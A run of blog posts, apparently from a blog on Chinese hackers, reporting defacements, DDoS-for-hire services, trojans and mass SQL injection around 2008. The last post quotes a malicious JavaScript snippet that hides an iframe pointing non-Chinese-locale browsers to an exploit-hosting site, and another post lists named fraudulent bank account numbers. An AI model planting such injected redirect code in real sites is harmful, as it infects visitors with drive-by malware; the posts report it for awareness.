The Dark Visitor

Solid “B” work here guys and not trying to make you feel bad about you…but, making the “could have done better” face in your direction:

CHINESE computer hackers are responsible for 88 per cent of attacks on Australian government web sites, according to web security company TippingPoint.

Read why Chinese hackers can’t break that remaining 12%…

Not sure if this even qualifies as a post but, whatevah:

Government officials are not confirming a report that Chinese officials may have secretly copied the contents of a government laptop computer during a December visit to China by Commerce Secretary Carlos Gutierrez.

Commerce Secretary Carlos Gutierrez’s visit to China has raised security questions.

The Associated Press said an investigation into the suspected incident also involved whether China used the information to try to hack into Commerce computers.

The AP cited officials and industry experts as sources for the story, which said the surreptitious copying is believed to have occurred when a laptop belonging to someone in the U.S. trade delegation was left unattended.

When asked whether the Commerce Department is looking into the matter, spokesman Richard Mills said, “We take security seriously, and as we learn of concerns about security, we look into them.”

This does continue…

I have no words…

Hackers working on behalf of China’s People’s Liberation Army have penetrated networks controlling electric power grids in the United States, computer security experts believe. And that may have precipitated a massive blackout on the east coast in 2003, as well as a blackout in Florida this year.

That’s just one blockbuster assertion in a long story full of them, from National Journal scoopster Shane Harris.

More here…

The first calls are starting to make the rounds on Chinese hacker sites to attack the Sharon Stone website. The actress recently started a firestorm in China after she gave an interview suggesting that the earthquake in Sichuan was the result of bad karma. I guessed it would be just a matter of time before Chinese hackers targeted her online and have been monitoring the boards.

One site has posted a bit of initial reconnaissance of the website:

There was also a post asking to have the unofficial website of Sharon Stone hacked:

Tried going to the website for a contact address but found the, “This site may harm your computer” posting. Maybe Jumper will have the time to check it out later.

In the male dominated world of Chinese hackers, females find it difficult to be accepted as equals. Their technical skills are often viewed as inferior to their male counterparts.

As far as I am aware, the first group of female Chinese hackers to break this mold were the Six Golden Flowers. The Golden Flowers have since broken up and gone their separate ways, but a new and larger group has taken their place, the Cn (China) Girl Security Team.

The website for the China Girl Security Team was registered on 12 Mar 2007 and currently has 2,217 members. The leader of the group Xiao Tian, is only 19 years old:

One of Xiao Tian’s chief lieutenants, who goes by the online name of Clever Without Equal (that’s close anyway), is dialed into just about every major Chinese hacker site on her blog:

Also linked through Clever’s blog is Evbs:

She seems to be getting the hang of this hacking thing:

Ordinarily, I’d try to obfuscate text on this subject but since we’re already GFW’d, who cares…

A couple of sites are reporting that the well-known Tibet independence writer Woeser has had all or many of her online accounts hijacked and her website defaced with an anti-splittist message. The Honkers Union of China has taken responsibility.  The honkers have used her Skype account to attempt to contact her associates.  No word if the contact list has been abused to send malware.  Interesting snippet from the article:

The hackers removed the content of the website and replaced it with a gif animation of the Chinese flag with the headline “LONG LIVE THE PEOPLE’S REPUBLIC OF CHINA! “DOWN WITH TIBET INDEPENDENCE!” Below the animation is a photo of Woeser with the words “Please remember this Tibetan separatist Woeser’s ugly face. Whoever sees this ugly face, please beat her hard like one beats a dog.” Further text was added and has apparently been changed several times in the hours since the site was hacked. The website is currently hosted on a server in the United States.

The website is still defaced at the time of this writing.

On this Memorial Day, I would like to share a letter written from Jessica to her father, CSM James D Blankenbecler.  If it doesn’t bring a tear to your eye, probably nothing will.  God bless all of the men and women who have sacrificed so much for their country!

Jessica’s letter…

According to reports, a detachment from the Shenzhen Public Security Bureau Internet Police organization, assisted the Jiangsu Police Department in arresting a male suspect who had hacked into the Kunshan Red Cross website to defraud people donating to victims of the Sichuan earthquake.

A 24 year old suspect, named Yang (from Hubei), was arrested for altering the information on the homepage that listed the phone number and bank account number used to make donations.

In the above shot, I have shown the area the hacker altered.  It is unclear if this is somehow related to the previous incident.

Meet Demon Group, an organization that specializes in providing much needed hacking services…their fellow citizens would like to see them dead or jailed…in no particular order or combination.

The screen capture above had to be taken from a Google cache because Demon Group’s website (www.ddosx.cn) seems to have vanished from the interwebs. I have some theories on why it disappeared, which I will share later.

First noticed the group when I found one of their advertisements on Baidu Postings (Large Chinese BBS):

The group claims to provide various types of DDoS attack services on internet cafes, websites, private servers, servers…etc. They sell attack software packages and rent out specialized tools to gather up infected computers (Guaranteed to gather up no fewer than 600-900 in a single day). The contact number provided is QQ:81991.

Demon Group Spams

Demon group, you spam your services…you spam them a lot! You spam them too much! Now you have ticked off a guy named Good Good, he would like to see you go to jail, he has reported you to the INTERNET POLICE!

Continue Reading »

If I was in the business of spotting popular trends, the first thing I would do is a hire a Chinese hacker. While the rest of the world is passively watching events unfold around them, Chinese hackers are doing the math on how many people will participate and what online avenues are associated with them…like symbols.

According to an article in tech.ccidnet.com, hackers are using recent events and the patriotism they have inspired to spread a new trojan called, “Red Heart Robber.”  The snatching of the Olympic torch, the CNN incident, and earthquake in Sichuan have caused the Chinese online community to attach red hearts with the Chinese flag (and other variations) to their QQ sig and webpages to show support/sympathy for China.  When normal online users download the image of the red heart flag to show their support for China, a nasty little trojan is attached.

Attacking your own symbol of patriotism…not cool!

From Computer World:

Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites, according to a security company in Taiwan.

First detected on May 13, the attack is coming from a server farm inside China, which has made no effort to hide its IP addresses, said Wayne Huang, CEO of Armorize Technologies Inc. in Taipei.

“The attack is ongoing,” Huang said. “Even if they can’t successfully insert malware, they’re killing lots of Web sites right now, because they’re just brute-forcing every attack surface with SQL injection, and hence causing lots of permanent changes to the victim Web sites.”

Read more…here

“Electronic Heroin” an analysis of Chinese juvenile cybercrime (Part I)

Second, analysis on the causes of juvenile cybercrime

What are the reasons for juvenile cybercrime?  Adolescents resides in puberty, where large changes take place in both physiology and psychology.  Individual youth are led down the wrong road and step onto the path of criminality due to individual physiology, psychology and different types of conflicts and contradictions  Additionally, in real life there are unhealthy influences and during the socialization process, deviations and distortions easily occur in individual youth.

1. As young people mature, there is a conflict between a sense of isolation and an intense feeling of needing to belong.  On the internet, they find this compensation in the openness, equality and freedom that make a perfect match for their needs.  This makes juveniles the main crowd on the internet.  The virtual nature, openness and freedom of the internet permits unrestricted conversations that cause youth to disseminate obscene materials; their morales and sense of responsibility decay; and their awareness of legality is diluted to the point they don’t feel it is a crime.  It becomes so serious that they will even break the law.
2. The current internet legal system is not robust, allowing cybercriminals to act without legal restrictions.  Although the country has laid out a series of laws and regulations regarding internet security and punishments for computer crimes, such as the “People’s Republic of China Computer Information Systems Security and Safeguards Regulation,” the current laws are unable to adapt to the current situation of  computer development.  This is especially true for new internet problems that arise that the law is unable to restrict.  This brings about a legal gap.
3. The unhealthy content on the internet has caused juvenile criminals to bury (hide) hidden dangers.  The internet is full of pornography, reactionary (material) and violent information; as well as traps.  Understaffed chatroom supervision allows juvenile cybercriminals to bury (hide) inducements.  Some managers of underground internet cafes are the ringleaders who entice youth into criminal activity.  Some internet cafe managers are only concerned with profit, regardless of the harm the unhealthy information does to the youth, or the youth browsing all manner of pornography, reactionary (material), or violent websites.  Some go far as to supply them with these materials.  At the same time, bloody and violent internet games are the hotbed for juvenile cybercrime.  Research indicated that long-term playing of bloody and violent online games which can cause the user to develop an aggressive personality that leads to criminal activity.
4. Factors in society, school and the family are also causes of juvenile cybercrime.  Some morally corrupt individuals online recklessly spread pornographic and violent images, as well as popular online games that cause segments of the youth to become infatuated with them.  They are unable to pay the  online game fees so they take risks.  The school’s education on ethics and online morality is insufficient.  The negative evaluation of weak students, the dislike and discrimination against students with bad behavior causes some students to give up on themselves.  They become infatuated with the internet and look there to find self confidence and happiness.  Furthermore, the education at home is inappropriate, with parents not strictly supervising there children online.  Some parent’s unhealthy personal habits also influence their children.

Hacker illegally invades section of the official Red Cross website and tampers with solicited donation accounts

Verified by the Ministry of Public Security, a section of the official Red Cross website has been illegally hacked. According to the report, criminal elements gained access to the section of the website that held the special accounts for earthquake disaster relief donations.

An individual named Li Bujiu, had opened four fraudulent bank accounts to steal the funding.

The Ningbo Bank released a statement warning all citizens to be verify account numbers when making donations. The bank suggested using CCTV, TV, and newspapers as references to verify the accounts.

The falsified accounts were listed as follows:

Opened by Li Yaqiong at the Henan, bank: Agriculture Bank of China, ACCT #: 6228482080560018616;

Opened by Li Bujiu at the Commerce bank, ACCT #: 6222002201101753792;

Opened by Li Bujiu at the Agricultural bank, ACCT #: 6228480150082864813;

Opened by Li Bujiu at the Construction bank, ACCT #: 6227003526450024660;

Opened by Li Bujiu at the Postal Savings Bank, ACCT #: 6221886400011381263;

Opened by Lin Yumin at the Agricultural bank, ACCT#: 9559980150169780312

I think it was Eddie Murphy who once said, “The only reason you would want to do something like this is if you wanted to go to straight to hell and not wait in line!”

This is a long article and will need to be done in at least two parts (three?), along with a lot of gisting. It came out yesterday on Chinacourt.org and provides an in-depth look at the drivers pushing juvenile cybercrime in China:

Analysis: Juvenile Cybercrime Causes and Prevention

In the past few years, following the rapid expansion of the internet in our country (China), the internet has become a daily part of many people’s lives and an intrical component. According to statistics, in 2007, the number of online users in our country (China) reached 162 million people with juvenile users accounting for 85.8% of that figure. Furthermore, among the country’s juvenile users, 13.2% have become addicts and another 13% manifest internet addiction tendencies. The highest proportion of internet addiction occurs in 17.1% of juvenile users from the ages of 13 to 17. While the internet has the prospect of bringing happiness and creating large amounts of wealth, it also introduces enticements and sin. According to statistical data, 90% of juveniles go online to play games, while the rest use it to chat or browse unhealthy websites. Browsing unhealthy websites and playing online games is either the direct or indirect cause of juvenile crime. This article, will analyze the manifestation of juvenile cybercrime, exploring all of the causes that entice it, in order to have a beneficial discussion on countermeasures to prevent juvenile cybercrime. First, the manifestation and characteristics of juvenile cybercrime: Following the application and development of computer network technology, the youth have clearly become the majority of internet users and cybercrime has become a new phenomenon of juvenile criminals. Due to the psychological immaturity of youth, they unhesitatingly throw themselves into the internet, becoming excessively dependent and turn into “electronic heroin junkies.” Not only has the internet taken away their thirst for knowledge and kindheartedness, it has also robbed them of their precious youth. From investigations into cybercriime cases over the last couple of years, Chinese juvenile cybercrime manifests itself in these forms:

1. The internet is used to carry out traditional types of crime such as theft, ransom, injury, fraud, robbery…etc. The virtual nature of the internet provides an artificial space and convenient channel for juvenile to carry out crimes. They can very easily hide their true identity, address…etc, to carry out criminal activity.

Continue Reading »

Benny from security4all.be sent Heike a link to an article at the Internet Storm Center that covers some patriotic mass SQL-Injection attacks.  The attacker appended this text to the bottom of every compromised index.htm file (this text was copied from the ISC and includes their edits):

“This is a mass invasion.        Safeguard the motherland’s dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com “

Another site that Paul from pauldotcom.com found and contributed to ISC includes obfuscated javascript that includes a function to evaluate if the web browser is configured for PRC/Mainland Chinese - zh-cn.  Anyone who doesn’t have zh-cn gets redirected to a site hosting browser exploits.  Cool.  here is the code snippet from the ISC:

if (navigator.systemLanguage==’zh-cn‘){}else{document.writeln(”<iframe
src=http://www.ririwow.cn/index.htm” width=100 height=0></iframe>”);}

This reminds me of the patriotic virus that Heike blogged about a while ago that only exploited machines configured for the traditional Chinese character set (most mainland Chinese use simplified).

Thanks for the heads-up Benny!